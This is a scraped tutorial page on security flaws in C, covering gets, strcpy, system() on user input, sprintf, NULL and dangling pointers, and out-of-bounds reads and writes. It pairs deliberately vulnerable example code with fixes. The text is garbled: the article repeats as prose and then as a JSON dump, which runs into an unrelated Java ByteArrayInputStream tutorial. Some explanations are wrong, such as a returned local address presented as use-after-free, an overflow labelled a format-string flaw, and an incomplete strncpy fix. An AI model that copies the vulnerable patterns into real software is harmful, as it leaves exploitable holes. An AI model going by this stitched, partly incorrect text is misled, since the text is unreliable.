Vulnerabilities: Format specifiers like %d and %s, if used in an improper way within the code, may give the attacker an edge to gain arbitrary code execution, leak information, and even completely control the application. If successful, sprintf() returns the total number of characters written excluding the null character appended to the string; in case of failure, a negative number is returned. Below is the C program to demonstrate the above concept- C // C program to implement// the above approach#include <stdio.h> // Driver codeint main(){ char str[5]; sprintf(str, "%s", "GGGGGGGGGGGGGG"); printf("%s", str);} Runtime Error: Abort signal from abort(3) (SIGABRT) Explanation: In the above code, the sprintf function with the format specifier %s may cause a buffer overflow because the output size is 15, which is greater than the size of the receiving buffer, which is only 5. Besides this, str[ ] can also be controlled by an external agent and cause all the above-mentioned vulnerabilities (CWE – 13). Observed CVEs are CVE-2001-0717, CVE-2002-1788, CVE-2006-2480 etc. Mitigation: Choose a language that does not have such flaws. Ensure that all format string functions are passed a static string that cannot be controlled by the user. Use functions that do not support the %n operator in format strings.
Note: Other library functions with the same type of vulnerability: fprintf, printf, sprintf, snprintf. Concept of Pointers: The pointer concept causes multiple security issues in the C programming language. 1. NULL Pointer Dereference: CWE CODE: CWE-476. If a program dereferences a pointer that is expected to be valid but turns out to be NULL, it causes a program crash or exit. The mitigation is to check for a NULL pointer before performing any operation. Observed CVEs are CVE-2005-3274, CVE-2005-1912, CVE-2004-0079 etc. Below is the C program to demonstrate the above concept- C // C program to implement// the above approach#include <stdio.h> // Driver codeint main(){ int val = 1; int* p = NULL; *p = val; printf("%d", *p); return 0;} Runtime Error: Segmentation Fault (SIGSEGV) Explanation: In this code, p is a NULL pointer, which means it does not point to a valid memory location, and trying to dereference it results in unexpected behavior in the program or a segmentation fault. Mitigation: Below is the C program to demonstrate the mitigation strategy for the above problem- C // C program to implement// the above concept#include <stdio.h> // Driver codeint main(){ int val = 1; int* p = NULL; if (p == NULL) { printf("Pointer is NULL"); } else { *p = val; printf("%d", *p); } return 0;} Output: Pointer is NULL Explanation: In this code, a check for a NULL pointer is performed first, before doing any operation on the pointer. Here the if statement checks for the NULL condition, and if it is found to be true, then no further operation is executed. 2. Use after Free (commonly referred to as a dangling pointer): CWE CODE: CWE-416. If memory is freed or goes out of scope and the program later uses a pointer that still references it, this situation occurs. It can cause a program crash, information leak, and data corruption. Observed CVEs are CVE-2010-4168, CVE-2010-2941, CVE-2010-2547 etc. Below is the C program to demonstrate the above concept- C // C program to implement// the above approach#include <stdio.h>int* fun(){ int y = 10; return &y;} // Driver codeint main(){ int* p = fun(); printf("%d", *p); return 0;} Output: Segmentation Fault (SIGSEGV) Explanation: In the above code, in the main() function, p contains the return value of fun(). With the call of fun(), control moves to the context of int *fun(); fun() returns the address of the ‘y’ variable, but in the context of main(), ‘y’ is no longer available after the program flow has returned. Therefore, it can be said that p is a dangling pointer, as it points to de-allocated memory. Mitigation: After freeing pointers, set them to NULL. Below is the C program to demonstrate the above concept- C // C program to implement// the above approach#include <stdio.h>#include <stdlib.h> // Driver codeint main(){ int n = 5; int* ptr; ptr = (int*)malloc(n * sizeof(int)); // Memory has been successfully allocated printf("Memory successfully allocated using malloc.\n"); // Free the memory free(ptr); printf("Malloc Memory successfully freed.\n"); // freed pointer set to NULL value ptr = NULL; return 0;} Output: Memory successfully allocated using malloc. Malloc Memory successfully freed. Explanation: In the above code, after the free(ptr) operation, the ptr pointer value is set to NULL, which mitigates the chances of a dangling pointer. No Bound Checking for Arrays: 1. Out of Bounds Write: CWE CODE: CWE-787. In this, the software writes data before or after the intended buffer. It may cause execution of unauthorized code, crash, and restart.
Observed CVEs are CVE-2020-0022, CVE-2009-0269, CVE-2009-1532 etc.Below is the C program to demonstrate the above concept- C // Program to demonstrate// accessing array out of bounds#include <stdio.h>int main(){ int arr[] = { 1, 2, 3, 4, 5 }; printf("arr [0] is %d\n", arr[0]); printf("arr[10] is %d\n", arr[10]); // allocation memory to out of bound // element arr[10] = 11; printf("arr[10] is %d\n", arr[10]); return 0;} Runtime Error: Segmentation Fault (SIGSEGV) Explanation:In this above code, array has valid indexes 0, 1, 2, 3, and 4 but there is an attempt to write the value on the arr[10]. As the C compiler will not check for the array bound it will write that data after the intended buffer. But when there is an attempt to print the value at index 10, it will show an error. Mitigation: Always make sure the buffer is large enough. Functions used to accept input should have a buffer limit implementation. Below is the C program to demonstrate the above concept- C // C program to implement// the above approach#include <stdio.h>int arr[5]; // Driver codeint main(){ int size = sizeof(arr) / sizeof(arr[0]); for (int i = 0; i < size; i++) { scanf("%d", &arr[i]); } // Print elements of array for (int i = 0; i < size; i++) { printf("%d ", arr[i]); } return 0;} Output: Input: 1 2 3 4 5 6 7 8 9 10Output: 1 2 3 4 5 Explanation:In the above code, the sizeof operator is being used to determine the size of the array so that one can get the valid range of the index. sizeof(arr) will give the entire size of the array and sizeof(arr[0]) will give the size of one element so using the divide operation one can easily find the number of elements in the array followed by the range of the index. 2. Out of Bounds Read: CWE CODE: CWE-125. In this, the software reads the data before or after the intended buffer. Attackers may use this to read sensitive information from other memory locations or may cause crashes.Observed CVEs are CVE-2014-0160, CVE-2009-2523, CVE-2004-0184 etc.Below is the C program to demonstrate the above concept- C // C program to implement// the above approach#include <stdio.h>int getValueFromArray(int* arr, int size, int index){ int value = -1; // only maximum limit is there if (index < size) { value = arr[index]; } return value;} // Driver codeint main(){ int arrtest[] = { 1, 2, 3, 4, 5 }; int j = getValueFromArray(arrtest, 5, -1); printf("%d", j); return 0;} Output: 0 Explanation:In this above code, the if statement within the function only checking the index value is less than the size of the array or not. The attacker may give a negative value as an index even that is not valid still the read operation will be executed which will eventually cause the reading of unintended data. Mitigation: Input validation. Ensure to validate correct calculations for length of an argument, buffer size, etc. Below is the C program to demonstrate the above concept- C // C program to implement// the above approach#include <stdio.h>int getValueFromArray(int* arr, int size, int index){ int value = -1; // only maximum limit and minimum // limit is there if (index >= 0 && index < size) { value = arr[index]; } return value;} // Driver codeint main(){ int arrtest[] = { 1, 2, 3, 4, 5 }; int j = getValueFromArray(arrtest, 5, -1); printf("%d", j); return 0;} Output: -1 Explanation:In this code, both maximum and minimum index range is checked in the if statement. If the attacker tries to give invalid indexes then the read operation will not be performed. 
[ { "code": null, "e": 23817, "s": 23789, "text": "\n01 Dec, 2021" }, { "code": null, "e": 24304, "s": 23817, "text": "C is a very powerful and popular programming language. It was first developed in the 1970s. C language is used in programming Network drivers, Interpreters, and Compilers, etc.Even though the C language is widely used in different systems still it has many security flaws associated with it. This article focuses on discussing security vulnerabilities in the C language. Mainly these security issues are related to vulnerable library functions, No bound checking for array and Pointers." }, { "code": null, "e": 24374, "s": 24304, "text": "Vulnerable Library Functions:CWE Codes: CWE – 242 , CWE – 120, CWE-77" }, { "code": null, "e": 24404, "s": 24374, "text": "1. Buffer And Memory Related:" }, { "code": null, "e": 24650, "s": 24404, "text": "a. gets(): This function is a part of the standard input-output library of the C language. It does not have any check for buffer size and malicious input can easily cause a buffer overflow.Below is the C program to demonstrate the above concept-" }, { "code": null, "e": 24652, "s": 24650, "text": "C" }, { "code": "// C program to implement// the above approach#include <stdio.h> // Driver codeint main(){ char buf[24]; printf(\"Please enter your name and press <Enter>\\n\"); gets(buf); printf(\"%s\", buf); return 0;}", "e": 24867, "s": 24652, "text": null }, { "code": null, "e": 24876, "s": 24867, "text": "Warning:" }, { "code": null, "e": 25166, "s": 24876, "text": "prog.c: In function ‘main’: prog.c:10:1: warning: implicit declaration of function ‘gets’ [-Wimplicit-function-declaration] gets(buf); ^ /tmp/ccmwzcCQ.o: In function `main’: 69c380139e12adbab30e0550af51f5a9.c:(.text+0x2e): warning: the `gets’ function is dangerous and should not be used. " }, { "code": null, "e": 25174, "s": 25166, "text": "Output:" }, { "code": null, "e": 25250, "s": 25174, "text": "Input: GeeksforGeeksOutput: Please enter your name and press GeeksforGeeks " }, { "code": null, "e": 25564, "s": 25250, "text": "Explanation:In the above code, the attacker can give large chunk of data as input, and the gets() function will try to store all that data into the buffer without considering the buffer size which will eventually cause a buffer overflow situation that can further cause arbitrary code execution, information leak." }, { "code": null, "e": 25768, "s": 25564, "text": "Mitigation:To solve this issue with the gets() function. Programmers can use fgets() function. It limits the input length based on the buffer size.Below is the C program to implement the above approach- " }, { "code": null, "e": 25770, "s": 25768, "text": "C" }, { "code": "// C program to implement// the above approach#include <stdio.h>#define MAX 15 // Driver codeint main(){ char buf[MAX]; fgets(buf, MAX, stdin); printf(\"%s\", buf); return 0;}", "e": 25956, "s": 25770, "text": null }, { "code": null, "e": 25964, "s": 25956, "text": "Output:" }, { "code": null, "e": 26007, "s": 25964, "text": "Input: GeeksforGeeksOutput: GeeksforGeeks " }, { "code": null, "e": 26205, "s": 26007, "text": "Explanation:In the above code, fgets() function is taking buffer size ‘MAX’ as an argument and it will only write data that can be safely stored into the buffer of that size without overflowing it." }, { "code": null, "e": 26735, "s": 26205, "text": "b. 
strcpy(): This built-in function also doesn’t check for the buffer length and can overwrite memory locations based on the malicious input.If the buffer size of dest string is more then src string, then copy the src string to dest string with terminating NULL character. But if dest buffer is less, then src then it will copy the content without terminating NULL character. The strings may not overlap, and the destination string must be large enough to receive the copy.Below is the C program to demonstrate the above concept-" }, { "code": null, "e": 26737, "s": 26735, "text": "C" }, { "code": "// C program to implement// the above approach#include <stdio.h>#include <string.h> // Driver codeint main(){ char str1[2]; char str2[] = \"GeeksforGeeks\"; strcpy(str1, str2); printf(\"Copied string is: %s\\n\", str1); return 0;}", "e": 26978, "s": 26737, "text": null }, { "code": null, "e": 26986, "s": 26978, "text": "Output:" }, { "code": null, "e": 27047, "s": 26986, "text": "Input: GeeksforGeeksOutput: Copied string is: GeeksforGeeks " }, { "code": null, "e": 27295, "s": 27047, "text": "Explanation:In the above code, strcpy() function is trying to copy the string available on str2[] to str1[] which does not have enough space in a buffer allocated to handle that which will eventually result in a buffer overflow in the application." }, { "code": null, "e": 27482, "s": 27295, "text": "Mitigation:Use of strncpy() function instead of strcpy(). strncpy() limits the length of input based on the buffer size available.Below is the C program to demonstrate the above concept-" }, { "code": null, "e": 27484, "s": 27482, "text": "C" }, { "code": "// C program to implement// the above approach#include <stdio.h>#include <string.h>#define BUFFER_SIZE 24 // Driver codeint main(){ // 24 is the buffer size char str1[BUFFER_SIZE]; char str2[] = \"GeeksforGeeks\"; // Limits number of characters // to be copied strncpy(str1, str2, BUFFER_SIZE); printf(\"Copied string is: %s\\n\", str1); return 0;}", "e": 27853, "s": 27484, "text": null }, { "code": null, "e": 27861, "s": 27853, "text": "Output:" }, { "code": null, "e": 27922, "s": 27861, "text": "Input: GeeksforGeeksOutput: Copied string is: GeeksforGeeks " }, { "code": null, "e": 28397, "s": 27922, "text": "Explanation:In the above code, strncpy() function is taking BUFFER_SIZE as an argument and it will only write data that can be safely stored into the str1[ ] without overflowing the buffer. Using strcpy() function to copy a large character array into a smaller one is dangerous, but if the string will fit, then it will not be worth the risk. If the destination string is not large enough to store the source string then the behavior of strcpy() is unspecified or undefined." }, { "code": null, "e": 28500, "s": 28397, "text": "Note:Other library functions with same type of vulnerability- calloc, malloc, realloc, strcat, memcpy." }, { "code": null, "e": 28727, "s": 28500, "text": "2. 
Command execution Vulnerabilities:If the attacker can control the command text or arguments to an external function call, then he can run arbitrary codes very easily.Below is the C program to demonstrate the above concept- " }, { "code": null, "e": 28729, "s": 28727, "text": "C" }, { "code": "// C program to implement// the above approach#include <stdio.h>#include <stdlib.h>#include <unistd.h> // Driver codeint main(){ char str[40]; fgets(str, 39, stdin); system(str); printf(\"%s\", str);}", "e": 28940, "s": 28729, "text": null }, { "code": null, "e": 28956, "s": 28940, "text": "Runtime Errors:" }, { "code": null, "e": 28988, "s": 28956, "text": "sh: 1: GeeksforGeeks: not found" }, { "code": null, "e": 28996, "s": 28988, "text": "Output:" }, { "code": null, "e": 29038, "s": 28996, "text": "Input: GeeksforGeeksOutput: GeeksforGeeks" }, { "code": null, "e": 29244, "s": 29038, "text": "Explanation:In the above code, if the str is controlled by the attacker then he can execute any command to the system and can put the entire system at risk. Observed CVEs are CVE-1999-0067, CVE-2019-12921." }, { "code": null, "e": 29256, "s": 29244, "text": "Mitigation:" }, { "code": null, "e": 29338, "s": 29256, "text": "Ensure that all external commands called from the program are statically created." }, { "code": null, "e": 29426, "s": 29338, "text": "Use library calls rather than external processes to recreate the desired functionality." }, { "code": null, "e": 29515, "s": 29426, "text": "Note:Other library functions with the same type of vulnerability: execl, execle, popen. " }, { "code": null, "e": 29999, "s": 29515, "text": "3. Format String Vulnerabilities:Format specifiers like %d, %s if used in an improper way within the code than it may give the edge to the attacker for gaining access for arbitrary code execution, information leak and can also completely control the application. If successful, it returns the total number of characters written excluding null-character appended in the string, in case of failure a negative number is returned. Below is the C program to demonstrate the above concept-" }, { "code": null, "e": 30001, "s": 29999, "text": "C" }, { "code": "// C program to implement// the above approach#include <stdio.h> // Driver codeint main(){ char str[5]; sprintf(str, \"%s\", \"GGGGGGGGGGGGGG\"); printf(\"%s\", str);}", "e": 30183, "s": 30001, "text": null }, { "code": null, "e": 30198, "s": 30183, "text": "Runtime Error:" }, { "code": null, "e": 30236, "s": 30198, "text": "Abort signal from abort(3) (SIGABRT) " }, { "code": null, "e": 30644, "s": 30236, "text": "Explanation:In this above code, the sprintf function with format specifier %s may cause a buffer overflow because the output size is 15 which is greater than the size of buffer received that is of size 5 only. Besides this, the str[ ] can also be controlled by a external agent and cause all the above mentioned vulnerabilities (CWE – 13 ). Observed CVEs are CVE-2001-0717, CVE-2002-1788, CVE-2006-2480 etc." }, { "code": null, "e": 30656, "s": 30644, "text": "Mitigation:" }, { "code": null, "e": 30695, "s": 30656, "text": "Choose a language not have such flaws." }, { "code": null, "e": 30801, "s": 30695, "text": "Ensure that all format string functions are passed a static string that cannot be controlled by the user." }, { "code": null, "e": 30870, "s": 30801, "text": "Use functions that do not support the %n operator in format strings." 
}, { "code": null, "e": 30972, "s": 30870, "text": "Note:Other library functions with the same type of vulnerability: fprintf, printf, sprintf, snprintf." }, { "code": null, "e": 31076, "s": 30972, "text": "Concept of Pointer:The pointer concept causes multiple security issues with the C programming language." }, { "code": null, "e": 31459, "s": 31076, "text": "1. NULL Pointer Dereference: CWE CODE: CWE-476. If a program dereference a pointer that is expected to be valid but turns out as NULL then it causes program crash, exit. Mitigation to this is to do a check for the NULL pointer before performing any operation. Observed CVEs are CVE-2005-3274, CVE-2005-1912, CVE-2004-0079 etc.Below is the C program to demonstrate the above concept-" }, { "code": null, "e": 31461, "s": 31459, "text": "C" }, { "code": "// C program to implement// the above approach#include <stdio.h> // Driver codeint main(){ int val = 1; int* p = NULL; *p = val; printf(\"%d\", *p); return 0;}", "e": 31634, "s": 31461, "text": null }, { "code": null, "e": 31649, "s": 31634, "text": "Runtime Error:" }, { "code": null, "e": 31678, "s": 31649, "text": "Segmentation Fault (SIGSEGV)" }, { "code": null, "e": 31874, "s": 31678, "text": "Explanation:In this code, *p is a NULL pointer which means it does not point to a memory location and trying to dereference it results in unexpected behavior in the program or segmentation fault." }, { "code": null, "e": 31971, "s": 31874, "text": "Mitigation:Below is the C program to demonstrate the mitigation stratergy for the above problem-" }, { "code": null, "e": 31973, "s": 31971, "text": "C" }, { "code": "// C program to implement// the above concept#include <stdio.h> // Driver codeint main(){ int val = 1; int* p = NULL; if (p == NULL) { printf(\"Pointer is NULL\"); } else { *p = val; printf(\"%d\", *p); } return 0;}", "e": 32227, "s": 31973, "text": null }, { "code": null, "e": 32235, "s": 32227, "text": "Output:" }, { "code": null, "e": 32252, "s": 32235, "text": "Pointer is NULL " }, { "code": null, "e": 32500, "s": 32252, "text": "Explanation:In this code, the first check is performed for a NULL pointer, before doing any operation on a pointer. Here is the if statement checks for the NULL condition and if it is found to be true then no further operation is getting executed." }, { "code": null, "e": 32890, "s": 32500, "text": "2. Use after Free(Commonly referred to as Dangling pointer): CWE CODE: CWE-416. If a referencing memory is freed and then there is any attempt made to free that again, then it cause this situation. It can cause a program crash, information leak, and data corruption. Observed CVEs are CVE-2010-4168, CVE-2010-2941, CVE-2010-2547 etc.Below is the C program to demonstrate the above concept-" }, { "code": null, "e": 32892, "s": 32890, "text": "C" }, { "code": "// C program to implement// the above approach#include <stdio.h>int* fun(){ int y = 10; return &y;} // Driver codeint main(){ int* p = fun(); printf(\"%d\", *p); return 0;}", "e": 33078, "s": 32892, "text": null }, { "code": null, "e": 33087, "s": 33078, "text": "Output: " }, { "code": null, "e": 33116, "s": 33087, "text": "Segmentation Fault (SIGSEGV)" }, { "code": null, "e": 33530, "s": 33116, "text": "Explanation:In the above code, the main() function the *p contains the return value of the fun(). With the call of fun() the control moves to the context of the int *fun(), the fun() returns the address of the ‘y’ variable but in the context of main() ‘y’ is no longer available after the program flow returned. 
Therefore, it can be said that the *p is a dangling pointer as it points to the de-allocated memory." }, { "code": null, "e": 33640, "s": 33530, "text": "Mitigation:After freeing pointers set them to NULL. Below is the C program to demonstrate the above concept- " }, { "code": null, "e": 33642, "s": 33640, "text": "C" }, { "code": "// C program to implement// the above approach#include <stdio.h>#include <stdlib.h> // Driver codeint main(){ int n = 5; int* ptr; ptr = (int*)malloc(n * sizeof(int)); // Memory has been successfully allocated printf(\"Memory successfully allocated using malloc.\\n\"); // Free the memory free(ptr); printf(\"Malloc Memory successfully freed.\\n\"); // freed pointer set to NULL value ptr = NULL; return 0;}", "e": 34081, "s": 33642, "text": null }, { "code": null, "e": 34089, "s": 34081, "text": "Output:" }, { "code": null, "e": 34168, "s": 34089, "text": "Memory successfully allocated using malloc. Malloc Memory successfully freed. " }, { "code": null, "e": 34319, "s": 34168, "text": "Explanation:In this above code, after free(ptr) operation the ptr pointer value is set to NULL and it will mitigate the chances of a dangling pointer." }, { "code": null, "e": 34348, "s": 34319, "text": "No bound Checking for Array:" }, { "code": null, "e": 34653, "s": 34348, "text": "1. Out of Bounds Write: CWE CODE: CWE-787 In this, the software writes the data before or after the intended buffer. It may cause execution of unauthorized codes, Crash and restart. Observed CVEs are CVE-2020-0022, CVE-2009-0269, CVE-2009-1532 etc.Below is the C program to demonstrate the above concept-" }, { "code": null, "e": 34655, "s": 34653, "text": "C" }, { "code": "// Program to demonstrate// accessing array out of bounds#include <stdio.h>int main(){ int arr[] = { 1, 2, 3, 4, 5 }; printf(\"arr [0] is %d\\n\", arr[0]); printf(\"arr[10] is %d\\n\", arr[10]); // allocation memory to out of bound // element arr[10] = 11; printf(\"arr[10] is %d\\n\", arr[10]); return 0;}", "e": 34978, "s": 34655, "text": null }, { "code": null, "e": 34993, "s": 34978, "text": "Runtime Error:" }, { "code": null, "e": 35022, "s": 34993, "text": "Segmentation Fault (SIGSEGV)" }, { "code": null, "e": 35343, "s": 35022, "text": "Explanation:In this above code, array has valid indexes 0, 1, 2, 3, and 4 but there is an attempt to write the value on the arr[10]. As the C compiler will not check for the array bound it will write that data after the intended buffer. But when there is an attempt to print the value at index 10, it will show an error." }, { "code": null, "e": 35355, "s": 35343, "text": "Mitigation:" }, { "code": null, "e": 35400, "s": 35355, "text": "Always make sure the buffer is large enough." }, { "code": null, "e": 35474, "s": 35400, "text": "Functions used to accept input should have a buffer limit implementation." 
}, { "code": null, "e": 35531, "s": 35474, "text": "Below is the C program to demonstrate the above concept-" }, { "code": null, "e": 35533, "s": 35531, "text": "C" }, { "code": "// C program to implement// the above approach#include <stdio.h>int arr[5]; // Driver codeint main(){ int size = sizeof(arr) / sizeof(arr[0]); for (int i = 0; i < size; i++) { scanf(\"%d\", &arr[i]); } // Print elements of array for (int i = 0; i < size; i++) { printf(\"%d \", arr[i]); } return 0;}", "e": 35866, "s": 35533, "text": null }, { "code": null, "e": 35875, "s": 35866, "text": "Output: " }, { "code": null, "e": 35921, "s": 35875, "text": "Input: 1 2 3 4 5 6 7 8 9 10Output: 1 2 3 4 5 " }, { "code": null, "e": 36297, "s": 35921, "text": "Explanation:In the above code, the sizeof operator is being used to determine the size of the array so that one can get the valid range of the index. sizeof(arr) will give the entire size of the array and sizeof(arr[0]) will give the size of one element so using the divide operation one can easily find the number of elements in the array followed by the range of the index." }, { "code": null, "e": 36638, "s": 36297, "text": "2. Out of Bounds Read: CWE CODE: CWE-125. In this, the software reads the data before or after the intended buffer. Attackers may use this to read sensitive information from other memory locations or may cause crashes.Observed CVEs are CVE-2014-0160, CVE-2009-2523, CVE-2004-0184 etc.Below is the C program to demonstrate the above concept-" }, { "code": null, "e": 36640, "s": 36638, "text": "C" }, { "code": "// C program to implement// the above approach#include <stdio.h>int getValueFromArray(int* arr, int size, int index){ int value = -1; // only maximum limit is there if (index < size) { value = arr[index]; } return value;} // Driver codeint main(){ int arrtest[] = { 1, 2, 3, 4, 5 }; int j = getValueFromArray(arrtest, 5, -1); printf(\"%d\", j); return 0;}", "e": 37071, "s": 36640, "text": null }, { "code": null, "e": 37079, "s": 37071, "text": "Output:" }, { "code": null, "e": 37081, "s": 37079, "text": "0" }, { "code": null, "e": 37399, "s": 37081, "text": "Explanation:In this above code, the if statement within the function only checking the index value is less than the size of the array or not. The attacker may give a negative value as an index even that is not valid still the read operation will be executed which will eventually cause the reading of unintended data." }, { "code": null, "e": 37411, "s": 37399, "text": "Mitigation:" }, { "code": null, "e": 37429, "s": 37411, "text": "Input validation." }, { "code": null, "e": 37514, "s": 37429, "text": "Ensure to validate correct calculations for length of an argument, buffer size, etc." 
}, { "code": null, "e": 37571, "s": 37514, "text": "Below is the C program to demonstrate the above concept-" }, { "code": null, "e": 37573, "s": 37571, "text": "C" }, { "code": "// C program to implement// the above approach#include <stdio.h>int getValueFromArray(int* arr, int size, int index){ int value = -1; // only maximum limit and minimum // limit is there if (index >= 0 && index < size) { value = arr[index]; } return value;} // Driver codeint main(){ int arrtest[] = { 1, 2, 3, 4, 5 }; int j = getValueFromArray(arrtest, 5, -1); printf(\"%d\", j); return 0;}", "e": 38042, "s": 37573, "text": null }, { "code": null, "e": 38051, "s": 38042, "text": "Output: " }, { "code": null, "e": 38054, "s": 38051, "text": "-1" }, { "code": null, "e": 38242, "s": 38054, "text": "Explanation:In this code, both maximum and minimum index range is checked in the if statement. If the attacker tries to give invalid indexes then the read operation will not be performed." }, { "code": null, "e": 38260, "s": 38242, "text": "gulshankumarar231" }, { "code": null, "e": 38279, "s": 38260, "text": "surindertarika1234" }, { "code": null, "e": 38290, "s": 38279, "text": "C Language" }, { "code": null, "e": 38388, "s": 38290, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 38397, "s": 38388, "text": "Comments" }, { "code": null, "e": 38410, "s": 38397, "text": "Old Comments" }, { "code": null, "e": 38448, "s": 38410, "text": "TCP Server-Client implementation in C" }, { "code": null, "e": 38474, "s": 38448, "text": "Exception Handling in C++" }, { "code": null, "e": 38494, "s": 38474, "text": "Multithreading in C" }, { "code": null, "e": 38535, "s": 38494, "text": "Arrow operator -> in C/C++ with Examples" }, { "code": null, "e": 38557, "s": 38535, "text": "'this' pointer in C++" }, { "code": null, "e": 38606, "s": 38557, "text": "How to split a string in C/C++, Python and Java?" }, { "code": null, "e": 38644, "s": 38606, "text": "UDP Server-Client implementation in C" }, { "code": null, "e": 38686, "s": 38644, "text": "Smart Pointers in C++ and How to Use Them" }, { "code": null, "e": 38731, "s": 38686, "text": "How to dynamically allocate a 2D array in C?" } ]
ByteArrayInputStream read() method in Java with Examples - GeeksforGeeks
28 May, 2020

The read() method of the ByteArrayInputStream class in Java is used in two ways:

1. The read() method of the ByteArrayInputStream class in Java is used to read the next byte of the ByteArrayInputStream. This read() method returns the byte that is read in the form of an integer, and if the input stream has ended this method returns -1. This method reads one byte at a time from the stream.

Syntax:

public int read()

Specified By: This method is specified by the read() method of the InputStream class.

Parameters: This method does not accept any parameter.

Return value: This method returns the read byte in the form of an integer. If the stream has ended then it returns -1.

Exceptions: This method does not throw any exception.

Below program illustrates the read() method of the ByteArrayInputStream class in the IO package:

Program:

// Java program to illustrate
// ByteArrayInputStream read() method

import java.io.*;

public class GFG {
    public static void main(String[] args) throws Exception
    {
        // Create byte array
        byte[] buf = { 71, 69, 69, 75, 83 };

        // Create byteArrayInputStream
        ByteArrayInputStream byteArrayInputStr
            = new ByteArrayInputStream(buf);

        int b = 0;
        while ((b = byteArrayInputStr.read()) != -1) {

            // Convert byte to character
            char ch = (char)b;

            // Print the character
            System.out.println("Char : " + ch);
        }
    }
}

Char : G
Char : E
Char : E
Char : K
Char : S

2. The read(byte[ ], int, int) method of the ByteArrayInputStream class in Java is used to read the given number of bytes into the given byte array from the ByteArrayInputStream. This method is different from the above read() method as it can read several bytes at a time. It returns the total number of bytes read as the return value.

Syntax:

public int read(byte[ ] b,
                int offset,
                int length)

Overrides: This method overrides the read() method of the InputStream class.

Parameters: This method accepts three parameters:

b – It represents the byte array into which data is read.
offset – It represents the starting index in the byte array b.
length – It represents the number of bytes to be read.

Return value: This method returns the total number of bytes read into the buffer. If the input stream has ended, this method returns -1.

Exceptions:

NullPointerException – This method throws NullPointerException if the byte array b is null.
IndexOutOfBoundsException – This method throws IndexOutOfBoundsException if the length is greater than the length of the input stream after offset, or offset is negative, or length is negative.

Below program illustrates the read(byte[ ], int, int) method of the ByteArrayInputStream class in the IO package:

Program:

// Java program to illustrate
// ByteArrayInputStream
// read(byte[ ], int, int) method

import java.io.*;

public class GFG {
    public static void main(String[] args) throws Exception
    {
        // Create byte array
        byte[] buf = { 71, 69, 69, 75, 83 };

        // Create byteArrayInputStream
        ByteArrayInputStream byteArrayInputStr
            = new ByteArrayInputStream(buf);

        // Create buffer
        byte[] b = new byte[4];

        int total_bytes = byteArrayInputStr.read(b, 1, 3);

        // Total number of bytes read
        System.out.println("Total bytes read: " + total_bytes);

        for (byte ch : b) {

            // Print the character
            if (ch == 0)
                System.out.println("NULL");
            else
                System.out.println((char)ch);
        }
    }
}

Total bytes read: 3
NULL
G
E
E

References:
1. https://docs.oracle.com/javase/10/docs/api/java/io/ByteArrayInputStream.html#read()
2. https://docs.oracle.com/javase/10/docs/api/java/io/ByteArrayInputStream.html#read(byte%5B%5D, int, int)
[ { "code": null, "e": 23557, "s": 23529, "text": "\n28 May, 2020" }, { "code": null, "e": 23634, "s": 23557, "text": "The read() method of ByteArrayInputStream class in Java is used in two ways:" }, { "code": null, "e": 23938, "s": 23634, "text": "1. The read() method of ByteArrayInputStream class in Java is used to read the next byte of the ByteArrayInputStream. This read() method returns the byte that is read int the form of an integer and if the input stream is ended this method return -1. This method reads one byte at a time from the stream." }, { "code": null, "e": 23946, "s": 23938, "text": "Syntax:" }, { "code": null, "e": 23965, "s": 23946, "text": "public int read()\n" }, { "code": null, "e": 24043, "s": 23965, "text": "Specified By: This method is specified by read() method of InputStream class." }, { "code": null, "e": 24098, "s": 24043, "text": "Parameters: This method does not accept any parameter." }, { "code": null, "e": 24216, "s": 24098, "text": "Return value: This method returns the read byte in the form of an integer. If the stream is ended then it returns -1." }, { "code": null, "e": 24270, "s": 24216, "text": "Exceptions: This method does not throw any exception." }, { "code": null, "e": 24355, "s": 24270, "text": "Below program illustrates read() method in ByteArrayInputStream class in IO package:" }, { "code": null, "e": 24364, "s": 24355, "text": "Program:" }, { "code": "// Java program to illustrate// ByteArrayInputStream read() method import java.io.*; public class GFG { public static void main(String[] args) throws Exception { // Create byte array byte[] buf = { 71, 69, 69, 75, 83 }; // Create byteArrayInputStream ByteArrayInputStream byteArrayInputStr = new ByteArrayInputStream(buf); int b = 0; while ((b = byteArrayInputStr.read()) != -1) { // Convert byte to character char ch = (char)b; // Print the character System.out.println(\"Char : \" + ch); } }}", "e": 24987, "s": 24364, "text": null }, { "code": null, "e": 25033, "s": 24987, "text": "Char : G\nChar : E\nChar : E\nChar : K\nChar : S\n" }, { "code": null, "e": 25366, "s": 25033, "text": "2. The read(byte[ ], int, int) method of ByteArrayInputStream class in Java is used to read the given number of bytes into the given byte array from the ByteArrayOutputStream. This method is different from the above read() method as it can read several bytes at a time. It returns the total number of bytes read as the return value." }, { "code": null, "e": 25374, "s": 25366, "text": "Syntax:" }, { "code": null, "e": 25461, "s": 25374, "text": "public void read(byte[ ] b,\n int offset,\n int length)\n" }, { "code": null, "e": 25530, "s": 25461, "text": "Overrides: This method overrides read() method of InputStream class." }, { "code": null, "e": 25580, "s": 25530, "text": "Parameters: This method accepts three parameters:" }, { "code": null, "e": 25638, "s": 25580, "text": "b – It represents the byte array into which data is read." }, { "code": null, "e": 25701, "s": 25638, "text": "offset – It represents the starting index in the byte array b." }, { "code": null, "e": 25756, "s": 25701, "text": "length – It represents the number of bytes to be read." }, { "code": null, "e": 25888, "s": 25756, "text": "Return value: This method returns total number of bytes read into the buffer. If the input stream is ended, this method returns -1." 
}, { "code": null, "e": 25900, "s": 25888, "text": "Exceptions:" }, { "code": null, "e": 25992, "s": 25900, "text": "NullPointerException – This method throws NullPointerException if the byte array b is null." }, { "code": null, "e": 26180, "s": 25992, "text": "IndexOutOfBoundsException – This method throws IndexOutOfBoundsException if the length is greater than the length of input stream after offset or offset is negative or length is negative." }, { "code": null, "e": 26282, "s": 26180, "text": "Below program illustrates read(byte[ ], int, int) method in ByteArrayInputStream class in IO package:" }, { "code": null, "e": 26291, "s": 26282, "text": "Program:" }, { "code": "// Java program to illustrate// ByteArrayInputStream// read(byte[ ], int, int) method import java.io.*; public class GFG { public static void main(String[] args) throws Exception { // Create byte array byte[] buf = { 71, 69, 69, 75, 83 }; // Create byteArrayInputStream ByteArrayInputStream byteArrayInputStr = new ByteArrayInputStream(buf); // Create buffer byte[] b = new byte[4]; int total_bytes = byteArrayInputStr.read(b, 1, 3); // Total number of bytes read System.out.println(\"Total bytes read: \" + total_bytes); for (byte ch : b) { // Print the character if (ch == 0) System.out.println(\"NULL\"); else System.out.println((char)ch); } }}", "e": 27157, "s": 26291, "text": null }, { "code": null, "e": 27189, "s": 27157, "text": "Total bytes read: 